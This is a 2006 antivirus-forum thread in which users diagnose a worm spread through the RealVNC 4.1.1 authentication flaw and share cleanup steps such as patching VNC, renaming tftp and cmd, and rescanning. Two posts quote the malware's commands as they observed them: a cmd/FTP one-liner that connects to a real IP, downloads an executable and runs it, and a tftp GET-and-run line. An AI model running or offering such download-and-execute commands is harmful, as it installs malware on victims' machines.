Author Topic: DOS (tftp) virus  (Read 26507 times)

0 Members and 1 Guest are viewing this topic.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #15 on: September 24, 2006, 04:47:58 AM »
Hi aplcom,

Congratulations!!  8)       The last thing I would have focused on.

Great piece of work, my daughter at the time with 95% probability was running the vnc4.1.1 server to allow me to log in. Great mistake starting it up with the computer, as we rarely use it but I thought it was safe so when I saw it running a few weeks ago when in Europe I did not think much about it.  I had been wondering about if you would come back and tell that you still had the problem, I did not feel confident this was the cause you were finding, but I did not know enough to question your finding.

Naturally vnc is set to go through the firewall. I feel much better apart from the stupid thing of letting vnc run needlessly but of course the idea was I can connect whenever she is on line.

Did you work out from the packet sniffing where the origin IP was of the controller?  By the way I am no expert on packet sniffing only have the program and used it trying to figure out why my IP phone would not connect to another IP address on the same ISP network. (IP direct to IP no middleman)

Many thanks for coming to the forum sharing your information. I feel much relieved on this occasion. Will update and rename tftp as well.

C.


mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #16 on: September 24, 2006, 04:51:39 AM »
Very nice indeed, Otto.  Thanks for the update.

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #17 on: September 24, 2006, 01:16:55 PM »
Hi Cylosine,

I used ethereal to monitor the traffic once the run command was executed - then analysed the packet data offline. I was able to see that it was port 5900 (VNC) that was being compromised (thankfully not if full screen mode - rather strictly in command mode!!!) hence the culprit was trying to further compromise the system by downloading the worm programs and backdoors. This is a relatively new exploit so thankfully no damage was done.

I did do a trace back and found the offending IP - reported it plus the logs to the ISP - but I doubt that anything will come of it. Its a hackers world!!!! (At least on Win-x machines - I have no probs whatsoever on my linux boxes!!!!!)

It is a good idea to rename or move programs like ftp, tftp, cmd.exe (or simply lock them altogether). Also a good idea to do a thorough check with AVAST as well as PREVX1 (Thanks to Keith!!). You can also checkout nmap as well as grc.com to check what can get through your computer ip & ports.

Good luck and hope this also solves your problem.

Rgds. Otto.

mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #18 on: September 24, 2006, 02:52:47 PM »
I hate freewares becoming shareware.

I hate that too.  But it's still a good program, imo, even if the markteting strategy stinks  :)

Offline Lisandro

  • Avast team
  • Certainly Bot
  • *
  • Posts: 67194
Re: DOS (tftp) virus
« Reply #19 on: September 24, 2006, 03:40:00 PM »
I hate that too.  But it's still a good program, imo, even if the markteting strategy stinks  :)
Other programs could do the same or better being freeware (or, at least, having a Lite or free version).
For instance: System Safety Monitor (http://syssafety.com/:)
The best things in life are free.

FXsan78

  • Guest
Re: DOS (tftp) virus
« Reply #20 on: September 24, 2006, 11:44:25 PM »
Hello,

we have the same malware here it seems.
It is seen the same way by PrevX1, and activate regularly some cmd script TFTPxx.
It also creates louvz.exe and others in c:\windows\system32 and launch them, and a lot of bad thinks !
example in a cmd : cmd /c echo OPEN 82.239.65.45 27222>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit

It is MSQRSM, non detected by Avast , neith erother anti-virus (NAV, Grisoft) ou anti spyware (Ad aware).
but detected by PREVX1

I'd like to send you the .exe file .exe (237kb) for analyse and integration in Avast database, but it is in  c:\system volume information\-RESTORE{F75EEC69-6E97-419B-93B4-6A3A275301C4}\RP296\AA0044493.exe
and non accessible.
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !
I am working remotely on my father's PC, and cant boot on a DOS disck !

Any idea please to copy this file and send to you ?
It came by clicking a url in an HTML spam email ... but I erased the email (just too soon...)

OS = OS Windows XP SP2 home à jour des updates
Avast version 4.7.871 august 2006 - skin 4.2.7.3
Athlon 64 3200+    512 MB ram
messagerie Thunderbird
NAV + Avast

le logiciel lance des fenetres CMD avec des scripts de téléchargement TFTP xx, il empèche la connexion de mozilla et thunderdbird au web et comptes smtp / pop, il crée différents exe dans windows/system32, qui sont executés (vus dans le getionnaire des taches) etc. ASSEZ NOCIF...



Thanks
FX

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #21 on: September 25, 2006, 04:31:57 AM »
Hello FX,

You mention that you are working remotely on your dad's machine? Are you using RealVNC 4.1.1? If so - it has a security hole that can be breached in the auth module. Check out this site for more info:

http://fileinfo.prevx.com/adware/qqccf340481465-msin23040165/msinexecs.exe.html

Rgds. Otto.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #22 on: September 25, 2006, 05:20:15 AM »
Hi aplcom,

Thank you for ethereal information I understand, you are right about action is unlikely from ISP. Since this is now running in Europe too I assume Scotland Yard allready know about it.

From what we experience at least on some occasions [yes still running but that was an oversight on our behalf ] seems to be a download to another IP address than the host machine.  The trouble you saw was the attempt to download to your IP address?

I just see your question to FXsan78 come in, was going to inquire about the version too.  I guess he is in trouble as the dirt software already running.

@FXsan78
what keyboard layout is installed on your attacked machine?  I noticed the French at the bottom and I am very interested in type of keyboard you use on the target machine.

C.



cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #23 on: September 25, 2006, 05:29:15 AM »
Hi aplcom,

I forgot to add that for many weeks our computer has been running 'stealth' mode according to grc.com.  That was why I could not figure out how something had gotten through apparently without any action on the part of the operator.  It is however likely to be wishfull thinking that my daughter did not get it by email.

With vnc running all the time well bad luck for us.

C.

mauserme

  • Guest
Re: DOS (tftp) virus
« Reply #24 on: September 25, 2006, 01:47:15 PM »
I deactivated Windows restauration on all hard drive and rebooted, but still no access to this directory, neither directly, or for anti-virus soft !

Any idea please to copy this file and send to you ?

Hi FX,

When you turned off System Restore you effectively deleted the file from that location.  If its still on your hard drive somewhere else you can email a zipped and password protected sample to virus@avast.com.  Make sure to explain that it is an undetected virus and provide the password in the body of your email.

If you're using RealVNC make sure you follow aplcom's link to patch this security hole.



@aplcom and cylosine,

If FX's infection is the same as yours then you may find the problem recurs even after applying the RealVNC patch.  If it does then do as FX did:  turn off System Restore, reboot, and scan again.

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #25 on: September 25, 2006, 04:16:32 PM »
We have installed RealVNC 4.1.2 and are trying to log the attacks. They seem to still occur but now Sygate Personal Firewall is warning of attempts to connect VNC session. We have decided to keep VNC server running for a while.

From the data we believe that the attack is coming from a computer in the same big network which our computer is connected to. I am guessing this is a random number and that it is automated.  Hope to catch a few more before the attacks stop. The originator can't be that silly to keep it up for a long time allowing tracing.

I noticed that the free version of VNC is a bit limited in the use of encryption for this reason I am reconsidering its use over the internet, it is a bit of a jungle to get through safely.

C.

aplcom

  • Guest
Re: DOS (tftp) virus
« Reply #26 on: September 25, 2006, 04:43:12 PM »
Hi,

I've not had any re-occurance at all. Once I realized what the problem was, I booted from a clean "Win Live CD" and cleaned the hdd (deleted all tmp areas, deleted recycled etc etc etc) - ran several diff antivirus scanners and also manually cleaned the registry. I also put cmd.exe, tftp.exe, ftp.exe and several other pgms into a secure area only accessable by me (also renamed those pgms) just to be safe. I also re-installed the firewall from scratch and set new rules (Using Zonealarm - ONLY vnc has server rights - all else locked out).

I agree - the attack seems to occur on the same ISP network (mine is 221.124.x.y) - leads me to believe that someones computer on the network is compromised and the hacker is using that system to hack others on the same network. As the attack is identical every time - I also cant believe the hacker to be so stupid (hence it may be a bot??)

You can also consider ultraVNC or tightVNC - both are free - both offer super encryption - both dont have the auth security hole - however - realVNC 4.1.2 seems to have solved most of my problems.

Keeping my fingers crossed - but alls well so far!!

Rgds.

FXsan78

  • Guest
Re: DOS (tftp) virus
« Reply #27 on: September 27, 2006, 01:07:43 AM »
Hello,

 @ aplcom/Otto, yes I was using RealVNC 4.1.1.
I upgraded to 4.2 (30days version) after reading the post here.
Now I have found back a version 4.1.2 which is full without 30 days licence. I will install it back after solving everything

@cylosine, yes AZERTY french keyboard

@mauserme, as I said I deleted the email I suspected to have the link importing the virus, and sorry I could not send it to you

Tonight NAV reports a Magister virus. I will try remove tool, but will need some local aid for booting in safe mode ;-)

Thanks to all
fX

cylosine

  • Guest
Re: DOS (tftp) virus
« Reply #28 on: September 27, 2006, 01:48:04 AM »
Hi FXsan78,

VNC 4.2 is the "VNC Personal" version which costs money, I also got a bit confused and downloaded this but went searching a bit more for the so called "VNC Free" until I found it.

I am making a strong guess that the machine that attacked you also had a French AZERTY keyboard, this however unlikely to be of any help.

Depending on how familiar you are with computers I can recommend always having a Bart PE boot disk, this is a short version of Windows which will boot and run windows off a CD and you can access your hard disk from this environment.

This is similar to what aplcom is saying about using a "Win Live CD".

C.

leiw

  • Guest
Re: DOS (tftp) virus
« Reply #29 on: October 01, 2006, 08:53:31 AM »
Hi all, this is my first post,

My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers from my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP....

Any brother can tell me what type of Vrius Infected? and how to fix this problem ?
or just need upgrade the VNC version to 4.1.2 to solve all problem ?

Home VNC version 4.1.2, company server VNC version 4.1.1


Thanks !!!
Wilson